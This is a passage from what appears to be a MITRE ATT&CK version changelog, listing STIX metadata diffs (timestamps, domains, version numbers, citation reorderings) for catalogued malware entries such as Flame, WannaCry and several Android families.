external_references[2]['url']https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.htmlhttps://us-cert.cisa.gov/ncas/alerts/aa21-200a
external_references[5]['source_name']CISA AA21-200A APT40 July 2021Lee 2013
external_references[5]['description']CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department.. Retrieved August 12, 2021.Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.
external_references[5]['url']https://us-cert.cisa.gov/ncas/alerts/aa21-200ahttps://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html

[S0608] Conficker

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 19:41:44.167000+00:002022-04-25 14:00:00.188000+00:00

[S0038] Duqu

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 02:07:19.052000+00:002022-04-25 14:00:00.188000+00:00

[S0064] ELMER

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 16:21:32.420000+00:002022-07-26 23:33:26.355000+00:00
external_references[1]['description']Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.
external_references[1]['url']https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.htmlhttps://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

[S0568] EVILNUM

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-27 18:17:43.966000+00:002022-01-19 18:23:52.922000+00:00
external_references[3]['description']Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved January 28, 2021.Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved December 22, 2021.
external_references[3]['url']https://blog.prevailion.com/2020/05/phantom-in-command-shell5.htmlhttps://www.prevailion.com/phantom-in-the-command-shell-2/

[S0143] Flame

Current version: 1.1


Old Description
New Description
t1Flame is a sophisticated toolkit that has been used to collet1[Flame](https://attack.mitre.org/software/S0143) is a sophis
>ct information since at least 2010, largely targeting Middle>ticated toolkit that has been used to collect information si
> East countries. (Citation: Kaspersky Flame)>nce at least 2010, largely targeting Middle East countries. 
 >(Citation: Kaspersky Flame)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 16:41:41.805000+00:002022-10-12 17:51:18.408000+00:00
descriptionFlame is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame)[Flame](https://attack.mitre.org/software/S0143) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame)
external_references[2]['source_name']FlamersKyWIper
external_references[2]['description'](Citation: Kaspersky Flame) (Citation: Symantec Beetlejuice)(Citation: Kaspersky Flame) (Citation: Crysys Skywiper)
external_references[3]['source_name']sKyWIperFlamer
external_references[3]['description'](Citation: Kaspersky Flame) (Citation: Crysys Skywiper)(Citation: Kaspersky Flame) (Citation: Symantec Beetlejuice)
external_references[5]['source_name']Symantec BeetlejuiceCrysys Skywiper
external_references[5]['description']Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. Retrieved February 25, 2017.sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.
external_references[5]['url']https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothachehttps://www.crysys.hu/publications/files/skywiper.pdf
external_references[6]['source_name']Crysys SkywiperSymantec Beetlejuice
external_references[6]['description']sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. Retrieved February 25, 2017.
external_references[6]['url']https://www.crysys.hu/publications/files/skywiper.pdfhttps://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache

[S0531] Grandoreiro

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-12-22 21:22:34.174000+00:002022-10-19 22:11:10.040000+00:00
external_references[1]['source_name']Securelist Brazilian Banking Malware July 2020ESET Grandoreiro April 2020
external_references[1]['description']GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020.ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020.
external_references[1]['url']https://securelist.com/the-tetrade-brazilian-banking-malware/97779/https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/
external_references[2]['source_name']ESET Grandoreiro April 2020Securelist Brazilian Banking Malware July 2020
external_references[2]['description']ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020.GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020.
external_references[2]['url']https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

[S0581] IronNetInjector

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-13 00:20:21.372000+00:002022-05-20 17:02:59.587000+00:00
external_references[1]['url'] https://unit42.paloaltonetworks.com/ironnetinjector/https://unit42.paloaltonetworks.com/ironnetinjector/

[S0449] Maze

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-08-18 23:46:05.071000+00:002022-01-24 17:01:08.605000+00:00

[S0455] Metamorfo

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-09-27 19:32:33.491000+00:002022-10-18 23:23:55.295000+00:00
external_references[1]['source_name']MetamorfoCasbaneiro
external_references[1]['description'](Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019) (Citation: ESET Casbaneiro Oct 2019)
external_references[2]['source_name']CasbaneiroMetamorfo
external_references[2]['description'](Citation: ESET Casbaneiro Oct 2019)(Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019)

[S0280] MirageFox

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 17:05:26.798000+00:002022-07-22 18:52:32.764000+00:00
external_references[2]['url']https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/

[S0080] Mivast

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-25 16:03:26.871000+00:002022-07-20 20:09:46.802000+00:00
external_references[2]['url']http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdfhttps://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf

[S0056] Net Crawler

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-21 16:41:34.225000+00:002022-07-22 18:37:22.182000+00:00

[S0118] Nidiran

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-18 15:21:51.702000+00:002022-04-15 16:27:20.897000+00:00
external_references[1]['description']DiMaggio, J.. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016.DiMaggio, J. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016.

[S0368] NotPetya

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-23 19:31:47.185000+00:002022-04-25 14:00:00.188000+00:00

[S0340] Octopus

Current version: 2.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 02:42:45.953000+00:002022-04-06 17:15:58.173000+00:00
external_references[2]['source_name']Securelist Octopus Oct 2018ESET Nomadic Octopus 2018
external_references[2]['description']Kaspersky Lab's Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018.Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.
external_references[2]['url']https://securelist.com/octopus-infested-seas-of-central-asia/88200/https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf
external_references[3]['source_name']Security Affairs DustSquad Oct 2018Securelist Octopus Oct 2018
external_references[3]['description']Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021.Kaspersky Lab's Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018.
external_references[3]['url']https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.htmlhttps://securelist.com/octopus-infested-seas-of-central-asia/88200/
external_references[4]['source_name']ESET Nomadic Octopus 2018Security Affairs DustSquad Oct 2018
external_references[4]['description']Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021.
external_references[4]['url']https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdfhttps://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html

[S0145] POWERSOURCE

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 17:17:35.369000+00:002022-07-20 20:06:44.707000+00:00
external_references[3]['source_name']FireEye FIN7 March 2017Cisco DNSMessenger March 2017
external_references[3]['description']Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017.
external_references[3]['url']https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.htmlhttp://blog.talosintelligence.com/2017/03/dnsmessenger.html
external_references[4]['source_name']Cisco DNSMessenger March 2017FireEye FIN7 March 2017
external_references[4]['description']Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017.Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.
external_references[4]['url']http://blog.talosintelligence.com/2017/03/dnsmessenger.htmlhttps://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

[S0364] RawDisk

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2019-04-19 19:04:55.892000+00:002022-07-28 18:55:35.991000+00:00
external_references[2]['url']https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdfhttps://web.archive.org/web/20160303200515/https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf

[S0519] SYNful Knock

Current version: 1.0


Old Description
New Description
t1[SYNful Knock](https://attack.mitre.org/software/S0519) is at1[SYNful Knock](https://attack.mitre.org/software/S0519) is a
> stealthy modification of the operating system of network de> stealthy modification of the operating system of network de
>vices that can be used to maintain persistence within a vict>vices that can be used to maintain persistence within a vict
>im's network and provide new capabilities to the adversary.(>im's network and provide new capabilities to the adversary.(
>Citation: FireEye - Synful Knock)(Citation: Cisco Synful Kno>Citation: Mandiant - Synful Knock)(Citation: Cisco Synful Kn
>ck Evolution)>ock Evolution)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-10-22 17:35:04.950000+00:002021-12-14 23:14:26.027000+00:00
description[SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.(Citation: FireEye - Synful Knock)(Citation: Cisco Synful Knock Evolution)[SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.(Citation: Mandiant - Synful Knock)(Citation: Cisco Synful Knock Evolution)
external_references[1]['source_name']FireEye - Synful KnockMandiant - Synful Knock
external_references[1]['url']https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.htmlhttps://www.mandiant.com/resources/synful-knock-acis

[S0589] Sibot

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 22:30:19.071000+00:002022-10-18 23:33:55.403000+00:00

[S0146] TEXTMATE

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 18:19:25.928000+00:002022-07-20 20:06:44.708000+00:00
external_references[3]['source_name']FireEye FIN7 March 2017Cisco DNSMessenger March 2017
external_references[3]['description']Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017.
external_references[3]['url']https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.htmlhttp://blog.talosintelligence.com/2017/03/dnsmessenger.html
external_references[4]['source_name']Cisco DNSMessenger March 2017FireEye FIN7 March 2017
external_references[4]['description']Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017.Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.
external_references[4]['url']http://blog.talosintelligence.com/2017/03/dnsmessenger.htmlhttps://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

[S0436] TSCookie

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-07-07 14:05:07.519000+00:002022-04-15 11:32:25.171000+00:00
external_references[1]['source_name']JPCert TSCookie March 2018JPCert PLEAD Downloader June 2018
external_references[1]['description']Tomonaga, S.. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020.Tomonaga, S. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.
external_references[2]['source_name']JPCert BlackTech Malware September 2019JPCert TSCookie March 2018
external_references[2]['description']Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020.Tomonaga, S. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020.
external_references[2]['url']https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.htmlhttps://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html
external_references[3]['source_name']JPCert PLEAD Downloader June 2018JPCert BlackTech Malware September 2019
external_references[3]['description']Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020.Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020.
external_references[3]['url']https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.htmlhttps://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html

[S0004] TinyZBot

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-21 16:41:34.655000+00:002022-07-22 18:37:22.180000+00:00

[S0366] WannaCry

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-05-13 22:59:51.283000+00:002022-04-25 14:00:00.188000+00:00

[S0466] WindTail

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 06:31:19.173000+00:002022-04-20 22:03:11.833000+00:00

mobile-attack

Minor Version Changes

[S0182] FinFisher

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 15:32:08.360000+00:002022-03-02 15:47:13.329000+00:00
x_mitre_version1.31.4

[S0490] XLoader for iOS

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-10-16 01:48:10.412000+00:002021-12-07 14:46:08.852000+00:00
x_mitre_version1.01.1
Other Version Changes

[S0309] Adups

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['Adups']
x_mitre_old_attack_idMOB-S0025
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0319] Allwinner

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['Allwinner']
x_mitre_old_attack_idMOB-S0035
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0292] AndroRAT

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['AndroRAT']
x_mitre_old_attack_idMOB-S0008
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0293] BrainTest

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referenceshttp://blog.checkpoint.com/2015/09/21/braintest-a-new-level-of-sophistication-in-mobile-malware/
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['BrainTest']
x_mitre_old_attack_idMOB-S0009
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-04-15 15:36:43.770000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']BrainTestCheckPoint-BrainTest
external_references[1]['description'](Citation: CheckPoint-BrainTest) (Citation: Lookout-BrainTest)Andrey Polkovnichenko and Alon Boxiner. (2015, September 21). BrainTest – A New Level of Sophistication in Mobile Malware. Retrieved December 21, 2016.
external_references[2]['source_name']CheckPoint-BrainTestLookout-BrainTest
external_references[2]['description']Andrey Polkovnichenko and Alon Boxiner. (2015, September 21). BrainTest – A New Level of Sophistication in Mobile Malware. Retrieved December 21, 2016.Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. Retrieved December 21, 2016.
external_references[2]['url']http://blog.checkpoint.com/2015/09/21/braintest-a-new-level-of-sophistication-in-mobile-malware/https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/
x_mitre_version1.11.0
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Lookout-BrainTest', 'description': 'Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. Retrieved December 21, 2016.', 'url': 'https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/'}

[S0300] DressCode

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['DressCode']
x_mitre_old_attack_idMOB-S0016
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0315] DualToy

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['DualToy']
x_mitre_old_attack_idMOB-S0031
x_mitre_platforms['Android', 'iOS']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0322] HummingBad

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['HummingBad']
x_mitre_old_attack_idMOB-S0038
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0321] HummingWhale

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['HummingWhale']
x_mitre_old_attack_idMOB-S0037
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0325] Judy

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_aliases['Judy']
x_mitre_old_attack_idMOB-S0041
x_mitre_platforms['Android']
values_changed
STIX FieldOld valueNew Value
modified2018-12-11 20:40:31.461000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.11.0

[S0288] KeyRaider

Current version: 1.0

Version changed from: 1.1 → 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
